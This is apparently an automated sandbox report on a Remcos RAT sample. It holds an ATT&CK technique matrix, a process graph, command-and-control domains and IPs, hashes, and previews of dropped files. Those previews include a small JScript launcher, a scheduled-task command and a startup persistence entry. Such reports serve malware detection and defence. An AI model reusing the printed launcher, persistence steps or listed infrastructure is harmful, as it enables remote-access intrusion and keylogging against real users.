    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,21_2_002C2263
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,21_2_002C1C61
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information11
    Scripting
    2
    Valid Accounts
    1
    Windows Management Instrumentation
    11
    Scripting
    1
    Exploitation for Privilege Escalation
    1
    Disable or Modify Tools
    121
    Input Capture
    2
    System Time Discovery
    Remote Services1
    Archive Collected Data
    2
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory1
    Account Discovery
    Remote Desktop Protocol121
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    2
    Valid Accounts
    2
    Valid Accounts
    2
    Obfuscated Files or Information
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Scheduled Task/Job
    1
    Scheduled Task/Job
    21
    Access Token Manipulation
    1
    DLL Side-Loading
    NTDS17
    System Information Discovery
    Distributed Component Object ModelInput Capture1
    Remote Access Software
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd2
    Registry Run Keys / Startup Folder
    12
    Process Injection
    111
    Masquerading
    LSA Secrets2
    Security Software Discovery
    SSHKeylogging2
    Non-Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Scheduled Task/Job
    2
    Valid Accounts
    Cached Domain Credentials1
    Virtualization/Sandbox Evasion
    VNCGUI Input Capture2
    Application Layer Protocol
    Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    DCSync4
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
    Access Token Manipulation
    Proc Filesystem11
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
    Process Injection
    /etc/passwd and /etc/shadow1
    System Owner/User Discovery
    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585212 Sample: RailProvides_nopump.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 57 ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF 2->57 59 me-work.com 2->59 61 geoplugin.net 2->61 69 Suricata IDS alerts for network traffic 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 Yara detected Remcos RAT 2->73 75 8 other signatures 2->75 10 RailProvides_nopump.exe 27 2->10         started        13 wscript.exe 1 2->13         started        15 wscript.exe 2->15         started        signatures3 process4 signatures5 77 Uses schtasks.exe or at.exe to add and modify task schedules 10->77 17 cmd.exe 2 10->17         started        21 conhost.exe 10->21         started        23 schtasks.exe 1 10->23         started        79 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->79 25 LinkHub.com 13->25         started        27 LinkHub.com 15->27         started        process6 file7 47 C:\Users\user\AppData\Local\...\Propose.com, PE32 17->47 dropped 67 Drops PE files with a suspicious file extension 17->67 29 Propose.com 3 20 17->29         started        34 cmd.exe 2 17->34         started        36 cmd.exe 1 17->36         started        38 9 other processes 17->38 signatures8 process9 dnsIp10 63 me-work.com 193.26.115.39, 64689, 7009 QUICKPACKETUS Netherlands 29->63 65 geoplugin.net 178.237.33.50, 64705, 80 ATOM86-ASATOM86NL Netherlands 29->65 51 C:\Users\user\AppData\Local\...\LinkHub.com, PE32 29->51 dropped 53 C:\Users\user\AppData\Local\...\LinkHub.js, ASCII 29->53 dropped 55 C:\ProgramData\remcos\logs.dat, data 29->55 dropped 81 Detected Remcos RAT 29->81 83 Drops PE files with a suspicious file extension 29->83 85 Installs a global keyboard hook 29->85 40 cmd.exe 2 29->40         started        43 cmd.exe 1 29->43         started        file11 signatures12 process13 file14 49 C:\Users\user\AppData\Roaming\...\LinkHub.url, MS 40->49 dropped 45 conhost.exe 40->45         started        process15

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    RailProvides_nopump.exe10%VirustotalBrowse
    RailProvides_nopump.exe8%ReversingLabs
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com0%ReversingLabs
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    geoplugin.net
    178.237.33.50
    truefalse
      high
      me-work.com
      193.26.115.39
      truefalse
        high
        ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gpfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.autoitscript.com/autoit3/XPropose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000000.2074387011.0000000000F15000.00000002.00000001.01000000.00000006.sdmp, LinkHub.com, 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmp, LinkHub.com, 00000018.00000000.2213628665.0000000000315000.00000002.00000001.01000000.00000008.sdmp, LinkHub.com.13.dr, Clinton.9.dr, Propose.com.2.drfalse
              high
              http://nsis.sf.net/NSIS_ErrorErrorRailProvides_nopump.exefalse
                high
                https://www.autoitscript.com/autoit3/Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  178.237.33.50
                  geoplugin.netNetherlands
                  8455ATOM86-ASATOM86NLfalse
                  193.26.115.39
                  me-work.comNetherlands
                  46261QUICKPACKETUSfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1585212
                  Start date and time:2025-01-07 10:14:08 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 9s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:26
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:RailProvides_nopump.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winEXE@40/32@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 86
                  • Number of non-executed functions: 303
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  TimeTypeDescription
                  04:14:57API Interceptor1x Sleep call for process: RailProvides_nopump.exe modified
                  04:16:08API Interceptor5966695x Sleep call for process: Propose.com modified
                  10:15:03Task SchedulerRun new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                  10:15:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  178.237.33.50c2.htaGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  c2.htaGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  1.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  193.26.115.39c2.htaGet hashmaliciousRemcosBrowse
                    9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                      c2.htaGet hashmaliciousRemcosBrowse
                        c2.htaGet hashmaliciousRemcosBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          me-work.comc2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousXWormBrowse
                          • 193.26.115.21
                          c2.htaGet hashmaliciousXWormBrowse
                          • 193.26.115.21
                          c2.htaGet hashmaliciousXWormBrowse
                          • 193.26.115.21
                          c2.htaGet hashmaliciousXWormBrowse
                          • 87.120.117.152
                          p5.htaGet hashmaliciousXWormBrowse
                          • 45.88.186.197
                          geoplugin.netc2.htaGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          1.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          • 178.237.33.50
                          2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ATOM86-ASATOM86NLc2.htaGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          4XYAW8PbZH.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          1.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                          • 178.237.33.50
                          QUICKPACKETUSc2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                          • 172.82.129.154
                          9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                          • 193.31.28.181
                          3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                          • 185.230.138.58
                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 198.22.235.170
                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                          • 198.22.243.54
                          la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                          • 172.98.171.129
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comc2.htaGet hashmaliciousRemcosBrowse
                            installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                              Setup.exeGet hashmaliciousLummaCBrowse
                                DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                  installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                        Setup.exeGet hashmaliciousLummaCBrowse
                                          9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                            c2.htaGet hashmaliciousRemcosBrowse
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comc2.htaGet hashmaliciousRemcosBrowse
                                                installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                    DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                      installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                          'Set-up.exeGet hashmaliciousLummaCBrowse
                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                              9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                                                c2.htaGet hashmaliciousRemcosBrowse
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):224
                                                                  Entropy (8bit):3.419304580619056
                                                                  Encrypted:false
                                                                  SSDEEP:3:rglswxLFMlwfU5JWRal2Jl+7R0DAlBG45klovDl65lQWluEkiEW/ufWPlgMlRQln:Mlsy+x5YcIeeDAlOWA7DxbN2fBMMm0v
                                                                  MD5:E9348C25A707DDA85032AEAF8681327A
                                                                  SHA1:8934FA1D3CC9B8AE3208200636B5DFB7F572305F
                                                                  SHA-256:5A422217B9F28DD97B8F2082FBC65F2CDEC76583B36BAA9A0220952D1CCDD4F6
                                                                  SHA-512:F196FABAD8A5909101AC5FF3F78B9B02B2518221A1AAA4CB31C5E7EAF7A136B7151E5C26EE748E4C6DF4E7267CC59D7F684344409BB242711F5F034135780238
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                  Preview:....[.2.0.2.5./.0.1./.0.7. .0.4.:.1.5.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_36.8.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: DansMinistrie.exe, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
                                                                  • Filename: Set-up.exe, Detection: malicious, Browse
                                                                  • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: 9W9jJCj9EV.bat, Detection: malicious, Browse
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):197
                                                                  Entropy (8bit):4.78448241770474
                                                                  Encrypted:false
                                                                  SSDEEP:6:RiOnJHonwWDaJ0/hJkDHLFkNx5AW9GfwWDaJ0/hJkDHLFkNx57:YIQjW0hiF+/dG7W0hiF+/7
                                                                  MD5:9B88C78D6B81D1F27AD35770C174B03D
                                                                  SHA1:3DB685EB37D2CEB018CD6800C960104F32B53604
                                                                  SHA-256:F52D71B4F35F03A0275C5A80889CD1C2F0D8936ED3D43051C70528DAB2C5768C
                                                                  SHA-512:8F3D0F6282CB5F2D7D9A0F746B28876BA4B24444E54B7013EBA0592041220EF28B315B6505C1AF965B692BC678968B4F2B72C82527E88C79E8A094FB76E039D9
                                                                  Malicious:true
                                                                  Preview:new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):702975
                                                                  Entropy (8bit):7.9996899596807305
                                                                  Encrypted:true
                                                                  SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                  MD5:40320097845035E71C88A2796F2F751B
                                                                  SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                  SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                  SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_36.8.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: DansMinistrie.exe, Detection: malicious, Browse
                                                                  • Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
                                                                  • Filename: Set-up.exe, Detection: malicious, Browse
                                                                  • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                  • Filename: 9W9jJCj9EV.bat, Detection: malicious, Browse
                                                                  • Filename: c2.hta, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):702975
                                                                  Entropy (8bit):7.9996899596807305
                                                                  Encrypted:true
                                                                  SSDEEP:12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
                                                                  MD5:40320097845035E71C88A2796F2F751B
                                                                  SHA1:C6002D6BEC7322277FE88154FDE0829C8A8E2762
                                                                  SHA-256:62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
                                                                  SHA-512:57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\
                                                                  Process:C:\Users\user\Desktop\RailProvides_nopump.exe
                                                                  File Type:Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):488285
                                                                  Entropy (8bit):7.998550946105718
                                                                  Encrypted:true
                                                                  SSDEEP:12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
                                                                  MD5:7A07DED0E02828AA5F3CFBAD5642C558
                                                                  SHA1:166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
                                                                  SHA-256:2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
                                                                  SHA-512:9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
                                                                  Malicious:false
                                                                  Preview:MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@*w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...|uL.*....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j.*...Jl..[l..|.~.....f.*.>..
